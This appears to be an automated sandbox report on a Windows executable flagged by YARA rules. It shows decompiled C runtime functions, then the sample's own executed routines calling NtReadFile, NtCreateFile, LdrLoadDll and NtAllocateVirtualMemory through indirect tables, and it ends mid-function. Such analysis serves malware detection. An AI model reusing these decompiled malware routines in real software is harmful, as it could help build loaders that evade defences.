                                              0x00000000
                                              0x00d916bb
                                              0x00d916bb
                                              0x00d916bb
                                              0x00000000
                                              0x00d916bb
                                              0x00d91689
                                              0x00d91689
                                              0x00d9168c
                                              0x00000000
                                              0x00000000
                                              0x00d91690
                                              0x00d9169a
                                              0x00d916a0
                                              0x00d916a3
                                              0x00d916a9
                                              0x00d916ac
                                              0x00d916ae
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d916ae
                                              0x00d91658
                                              0x00d9165b
                                              0x00d9165d
                                              0x00d91662
                                              0x00d91662
                                              0x00d91667
                                              0x00000000
                                              0x00d91667
                                              0x00d9162e
                                              0x00d91633
                                              0x00d91637
                                              0x00d91637
                                              0x00000000

                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D91647
                                              • __isleadbyte_l.LIBCMT ref: 00D91675
                                              • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,00D9FF04,?,00000000), ref: 00D916A3
                                              • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,00D9FF04,?,00000000), ref: 00D916D9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: bf482f613f0bd6081750e2a0ab724744056e6d1e502a9c5c950e15b6278d640f
                                              • Instruction ID: 309b3c788733fc043ea21259d649f2962deb708f3b7b23bcddbebfe6a65dd27c
                                              • Opcode Fuzzy Hash: bf482f613f0bd6081750e2a0ab724744056e6d1e502a9c5c950e15b6278d640f
                                              • Instruction Fuzzy Hash: 9231AB39A04247AFDF229E65CC45BAA7BB5FF41350F1D4129F461871A0E731E8A1EBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8EC51, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00D8EC51(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00D8F19E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00D8ECD7(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00D8F413(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00D8F354(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                              0x00d8ec54
                                              0x00d8ec5a
                                              0x00d8eccd
                                              0x00000000
                                              0x00d8ec61
                                              0x00d8ec61
                                              0x00d8ec64
                                              0x00d8ec7f
                                              0x00d8ec82
                                              0x00d8eca2
                                              0x00d8ecb4
                                              0x00d8ec84
                                              0x00d8ec84
                                              0x00d8ec87
                                              0x00000000
                                              0x00d8ec89
                                              0x00d8ec9b
                                              0x00d8ec9b
                                              0x00d8ec87
                                              0x00d8ecd2
                                              0x00d8ecd6
                                              0x00d8ec66
                                              0x00d8ec7e
                                              0x00d8ec7e
                                              0x00d8ec64

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                              • Instruction ID: c8ac75023565e6f3c15ac3b5b9c07b3fd2e98181e3e402ac079495d98a937f4b
                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                              • Instruction Fuzzy Hash: 1201487280014ABBCF266F89CC41CEE3F22BB18354B598425FE5858031D737C9B1AFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8CBB0, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00D8CBB0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0xd9d9a0);
				E00D89100(__ebx, __edi, __esi);
				_t31 = E00D8D53F(__edx, __edi, _t35);
				_t25 =  *0xda1c6c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00D8BDFF(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xda1524; // 0x1456228
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xda1820;
								if(__eflags != 0) {
									E00D88EF3(_t33);
								}
							}
						}
						_t20 =  *0xda1524; // 0x1456228
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0xda1524; // 0x1456228
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00D8CC4C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00D874BF(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00D89145(_t33);
			}









                                              0x00d8cbb0
                                              0x00d8cbb0
                                              0x00d8cbb0
                                              0x00d8cbb0
                                              0x00d8cbb2
                                              0x00d8cbb7
                                              0x00d8cbc1
                                              0x00d8cbc3
                                              0x00d8cbcc
                                              0x00d8cbed
                                              0x00d8cbf3
                                              0x00d8cbf7
                                              0x00d8cbfa
                                              0x00d8cbfd
                                              0x00d8cc03
                                              0x00d8cc05
                                              0x00d8cc07
                                              0x00d8cc10
                                              0x00d8cc12
                                              0x00d8cc14
                                              0x00d8cc1a
                                              0x00d8cc1d
                                              0x00d8cc22
                                              0x00d8cc1a
                                              0x00d8cc12
                                              0x00d8cc23
                                              0x00d8cc28
                                              0x00d8cc2b
                                              0x00d8cc31
                                              0x00d8cc35
                                              0x00d8cc35
                                              0x00d8cc3b
                                              0x00d8cc42
                                              0x00d8cbd4
                                              0x00d8cbd4
                                              0x00d8cbd4
                                              0x00d8cbd7
                                              0x00d8cbd9
                                              0x00d8cbdd
                                              0x00d8cbe2
                                              0x00d8cbea

                                              APIs
                                                • Part of subcall function 00D8D53F: __getptd_noexit.LIBCMT ref: 00D8D540
                                              • __lock.LIBCMT ref: 00D8CBED
                                              • InterlockedDecrement.KERNEL32(?), ref: 00D8CC0A
                                              • _free.LIBCMT ref: 00D8CC1D
                                              • InterlockedIncrement.KERNEL32(01456228), ref: 00D8CC35
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                              • String ID:
                                              • API String ID: 2704283638-0
                                              • Opcode ID: d391ef3f988492e9950db01311ed95c94ed73f9a1835a8a7e53d33566e5a884f
                                              • Instruction ID: 78f02228e0e80f0d5dca683f31304c63460492437af7ff0a7b1c455f2df9bf67
                                              • Opcode Fuzzy Hash: d391ef3f988492e9950db01311ed95c94ed73f9a1835a8a7e53d33566e5a884f
                                              • Instruction Fuzzy Hash: 4D019236D05B11EBC711BB65984A79DB7A4FF05B10F1D500AE819A7390CB346941CFF6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D81AD0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 259COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00D81AD0(intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v45;
				short _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v64;
				intOrPtr _v68;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v92;
				char _v167;
				char _v168;
				signed int _t163;
				signed int _t177;
				signed int _t178;
				void* _t186;
				intOrPtr _t189;
				void* _t292;
				void* _t293;
				void* _t294;

				_v64 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v45 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v168 = 0;
				_t163 = E00D88740( &_v167, 0, 0x31);
				_t294 = _t293 + 0xc;
				asm("cvttsd2si eax, [ebp+0x8]");
				_v16 = _t163;
				asm("cdq");
				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
				asm("cdq");
				_v16 = _v16 / 0x3e8;
				_v8 = 4;
				while(_v8 >= 0) {
					asm("cdq");
					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
					asm("cdq");
					_v16 = _v16 / 0x64;
					_v8 = _v8 - 1;
				}
				_v36 =  *(_t292 + 0xffffffffffffffa4);
				asm("cdq");
				_v20 = _v36 / 0x64;
				asm("cdq");
				_v12 = _v36 % 0x64;
				asm("cdq");
				_v40 = _v12 / 0xa;
				_t177 = _v12;
				asm("cdq");
				_t178 = _t177 / 0xa;
				_v44 = _t177 % 0xa;
				if(_v12 >= 0x14 || _v20 == 0) {
					if(_v12 >= 0x14 || _v20 != 0) {
						if(_v12 <= 0x14 || _v20 == 0) {
							E00D81DF0(_t178, _v40,  &_v92);
							E00D81DE0( &_v32, _v44,  &_v32);
							E00D880E0( &_v64,  &_v32);
							_t294 = _t294 + 8;
						} else {
							E00D81DE0(_v20, _v20,  &_v32);
							E00D880E0( &_v64, "Hundred ");
							E00D81DF0(_v40, _v40,  &_v92);
							E00D880E0( &_v64,  &_v92);
							E00D81DE0( &_v32, _v44,  &_v32);
							E00D880E0( &_v64,  &_v32);
							_t294 = _t294 + 0x18;
						}
					} else {
						E00D81DE0( &_v32, _v12,  &_v32);
					}
				} else {
					E00D81DE0(_v20, _v20,  &_v32);
					E00D880E0( &_v64, "Hundred ");
					E00D81DE0(_v12, _v12,  &_v32);
					E00D880E0( &_v64,  &_v32);
					_t294 = _t294 + 0x10;
				}
				_v8 = 4;
				while(_v8 >= 0) {
					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
						asm("cdq");
						E00D81DF0( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
						asm("cdq");
						E00D81DE0( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
						E00D880E0(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
						_t294 = _t294 + 8;
					} else {
						E00D81DE0( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
					}
					_v8 = _v8 - 1;
				}
				_v8 = 0;
				while(_v8 < 5) {
					_t189 = E00D88260(_t292 + _v8 * 0x1e - 0x13c);
					_t294 = _t294 + 4;
					_v68 = _t189;
					if(_v68 != 0) {
						E00D880E0( &_v168, _t292 + _v8 * 0x1e - 0x13c);
						E00D880E0( &_v168,  &_v80);
						_t294 = _t294 + 0x10;
					}
					_v8 = _v8 + 1;
				}
				E00D880E0(_a12,  &_v64);
				_t186 = E00D88260(_a12);
				 *((char*)(_a12 + _t186 - 1)) = 0;
				return _t186;
			}


































                                              0x00d81ad9
                                              0x00d81adf
                                              0x00d81ae2
                                              0x00d81ae5
                                              0x00d81ae8
                                              0x00d81aeb
                                              0x00d81aef
                                              0x00d81af2
                                              0x00d81af8
                                              0x00d81afb
                                              0x00d81afe
                                              0x00d81b01
                                              0x00d81b13
                                              0x00d81b18
                                              0x00d81b1b
                                              0x00d81b20
                                              0x00d81b26
                                              0x00d81b36
                                              0x00d81b3d
                                              0x00d81b45
                                              0x00d81b48
                                              0x00d81b5a
                                              0x00d81b63
                                              0x00d81b6e
                                              0x00d81b75
                                              0x00d81b7d
                                              0x00d81b57
                                              0x00d81b57
                                              0x00d81b8e
                                              0x00d81b94
                                              0x00d81b9c
                                              0x00d81ba2
                                              0x00d81baa
                                              0x00d81bb0
                                              0x00d81bb8
                                              0x00d81bbb
                                              0x00d81bbe
                                              0x00d81bc4
                                              0x00d81bc6
                                              0x00d81bcd
                                              0x00d81c19
                                              0x00d81c37
                                              0x00d81ca1
                                              0x00d81cae
                                              0x00d81cbb
                                              0x00d81cc0
                                              0x00d81c3f
                                              0x00d81c47
                                              0x00d81c55
                                              0x00d81c65
                                              0x00d81c72
                                              0x00d81c82
                                              0x00d81c8f
                                              0x00d81c94
                                              0x00d81c94
                                              0x00d81c21
                                              0x00d81c29
                                              0x00d81c29
                                              0x00d81bd5
                                              0x00d81bdd
                                              0x00d81beb
                                              0x00d81bfb
                                              0x00d81c08
                                              0x00d81c0d
                                              0x00d81c0d
                                              0x00d81cc3
                                              0x00d81cd5
                                              0x00d81ce3
                                              0x00d81d03
                                              0x00d81d0c
                                              0x00d81d1c
                                              0x00d81d25
                                              0x00d81d3c
                                              0x00d81d41
                                              0x00d81ce5
                                              0x00d81cf1
                                              0x00d81cf1
                                              0x00d81cd2
                                              0x00d81cd2
                                              0x00d81d46
                                              0x00d81d58
                                              0x00d81d6c
                                              0x00d81d71
                                              0x00d81d74
                                              0x00d81d7b
                                              0x00d81d92
                                              0x00d81da5
                                              0x00d81daa
                                              0x00d81daa
                                              0x00d81d55
                                              0x00d81d55
                                              0x00d81db7
                                              0x00d81dc3
                                              0x00d81dce
                                              0x00d81dd6

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _memset
                                              • String ID: Hundred $Hundred
                                              • API String ID: 2102423945-1478457770
                                              • Opcode ID: 19b49bf9d6a28b196e3dd09fe2be9a36b14ea9c12568d27166eabaad2db7316e
                                              • Instruction ID: 316bfbcc7722034d755ec0597154f5a62bab22e0c5e2c2a237cf4eb7f3e8decd
                                              • Opcode Fuzzy Hash: 19b49bf9d6a28b196e3dd09fe2be9a36b14ea9c12568d27166eabaad2db7316e
                                              • Instruction Fuzzy Hash: B1A13FB5D00208EBCB04EFE8D881BDDB7B9FF88300F508569E115A7251EB759A49DB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8F6BC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E00D8F6BC(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _v20;
				void* _t4;
				intOrPtr* _t7;
				intOrPtr _t9;

				_t15 = __edx;
				_t13 = __ebx;
				_t4 = E00D93BBF(0, 0x10000, 0x30000);
				if(_t4 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00D88B27(__ebx, __edx);
					asm("int3");
					_t7 =  *_v20;
					__eflags =  *_t7 - 0xe06d7363;
					if( *_t7 != 0xe06d7363) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
							goto L9;
						} else {
							_t9 =  *((intOrPtr*)(_t7 + 0x14));
							__eflags = _t9 - 0x19930520;
							if(__eflags == 0) {
								L10:
								E00D8C649(_t13, _t15, 0, __eflags);
								asm("int3");
								E00D8C020(E00D8F6E3);
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t9 - 0x19930521;
								if(__eflags == 0) {
									goto L10;
								} else {
									__eflags = _t9 - 0x19930522;
									if(__eflags == 0) {
										goto L10;
									} else {
										__eflags = _t9 - 0x1994000;
										if(__eflags == 0) {
											goto L10;
										} else {
											goto L9;
										}
									}
								}
							}
						}
					}
				} else {
					return _t4;
				}
			}







                                              0x00d8f6bc
                                              0x00d8f6bc
                                              0x00d8f6ca
                                              0x00d8f6d4
                                              0x00d8f6d8
                                              0x00d8f6d9
                                              0x00d8f6da
                                              0x00d8f6db
                                              0x00d8f6dc
                                              0x00d8f6dd
                                              0x00d8f6e2
                                              0x00d8f6e9
                                              0x00d8f6eb
                                              0x00d8f6f1
                                              0x00d8f718
                                              0x00d8f718
                                              0x00d8f71b
                                              0x00d8f6f3
                                              0x00d8f6f3
                                              0x00d8f6f7
                                              0x00000000
                                              0x00d8f6f9
                                              0x00d8f6f9
                                              0x00d8f6fc
                                              0x00d8f701
                                              0x00d8f71e
                                              0x00d8f71e
                                              0x00d8f723
                                              0x00d8f729
                                              0x00d8f72f
                                              0x00d8f731
                                              0x00d8f703
                                              0x00d8f703
                                              0x00d8f708
                                              0x00000000
                                              0x00d8f70a
                                              0x00d8f70a
                                              0x00d8f70f
                                              0x00000000
                                              0x00d8f711
                                              0x00d8f711
                                              0x00d8f716
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8f716
                                              0x00d8f70f
                                              0x00d8f708
                                              0x00d8f701
                                              0x00d8f6f7
                                              0x00d8f6d6
                                              0x00d8f6d7
                                              0x00d8f6d7

                                              APIs
                                              • __controlfp_s.LIBCMT ref: 00D8F6CA
                                                • Part of subcall function 00D93BBF: __control87.LIBCMT ref: 00D93BE3
                                              • __invoke_watson.LIBCMT ref: 00D8F6DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __control87__controlfp_s__invoke_watson
                                              • String ID: csm
                                              • API String ID: 1371525046-1018135373
                                              • Opcode ID: d30a352ece180195bb089bf9072f338ca7b6f7ac9cea54e44997cf9d291e4f6e
                                              • Instruction ID: a56e73f7f2fe3cfaecba42c6b07c2749e300ffe5183e70a9720b0d0e999a6409
                                              • Opcode Fuzzy Hash: d30a352ece180195bb089bf9072f338ca7b6f7ac9cea54e44997cf9d291e4f6e
                                              • Instruction Fuzzy Hash: C5F090211003055B9A29BB297C4AB9A779D9F10311BA80462F4088A921EB50EEC5C3BA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: RRW9901200241.exe PID: 6148 Parent PID: 3016 RRW9901200241.exeCOMMON

                                              Executed Functions

                                              Function 00419E4C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: 2MA$2MA
                                              • API String ID: 2738559852-947276439
                                              • Opcode ID: ffbacb0ff6768ea67d50db7a63f44852735851931fa9d533e950e0cd74a17e4a
                                              • Instruction ID: 3209f46c228a1eec4796505ad7130892358afc4c55f1e7e5076a85ac0c541073
                                              • Opcode Fuzzy Hash: ffbacb0ff6768ea67d50db7a63f44852735851931fa9d533e950e0cd74a17e4a
                                              • Instruction Fuzzy Hash: 8EF04FB62002087FDB14DF99DC81DEB77ADEF8C710F148549FA5C97241C634E8118BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 25%
                                              			E00419E00(void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, void* _a40) {
				void* _v3;
				intOrPtr _t14;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t21;
				void* _t28;
				intOrPtr* _t29;

				_t14 = _a4;
				_t21 =  *((intOrPtr*)(_t14 + 0x10));
				_t29 = _t14 + 0xc48;
				E0041A950(_t28, _t14, _t29, _t21, 0, 0x2a);
				_t16 = _a36;
				 *((intOrPtr*)(__ebx - 0x3b7cdbb3)) =  *((intOrPtr*)(__ebx - 0x3b7cdbb3)) - _t21;
				asm("adc al, 0x52");
				_t13 =  &_a8; // 0x414d32
				_t19 =  *((intOrPtr*)( *_t29))( *_t13, _a12, _a16, _a20, _a24, _a28, _t21, _t16); // executed
				return _t19;
			}










                                              0x00419e03
                                              0x00419e06
                                              0x00419e0f
                                              0x00419e17
                                              0x00419e1f
                                              0x00419e21
                                              0x00419e27
                                              0x00419e3d
                                              0x00419e45
                                              0x00419e49

                                              APIs
                                              • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: 2MA$2MA
                                              • API String ID: 2738559852-947276439
                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                              0x00419d5f
                                              0x00419d67
                                              0x00419d89
                                              0x00419d9d
                                              0x00419da1

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: wKA
                                              • API String ID: 823142352-3165208591
                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                              0x0040acdc
                                              0x0040acdf
                                              0x0040ace4
                                              0x0040ace9
                                              0x0040acf3
                                              0x0040acf8
                                              0x0040acfb
                                              0x0040acfd
                                              0x0040ad05
                                              0x0040ad0a
                                              0x0040ad0a
                                              0x0040ad11
                                              0x0040ad19
                                              0x0040ad1c
                                              0x0040ad1e
                                              0x0040ad32
                                              0x00000000
                                              0x0040ad34
                                              0x0040ad3a
                                              0x0040acee
                                              0x0040acee
                                              0x0040acee

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                              • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                              • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                              • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00419F2E, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E00419F2E(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("les edx, [ebp-0x75]");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E0041A950(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                              0x00419f2f
                                              0x00419f33
                                              0x00419f3f
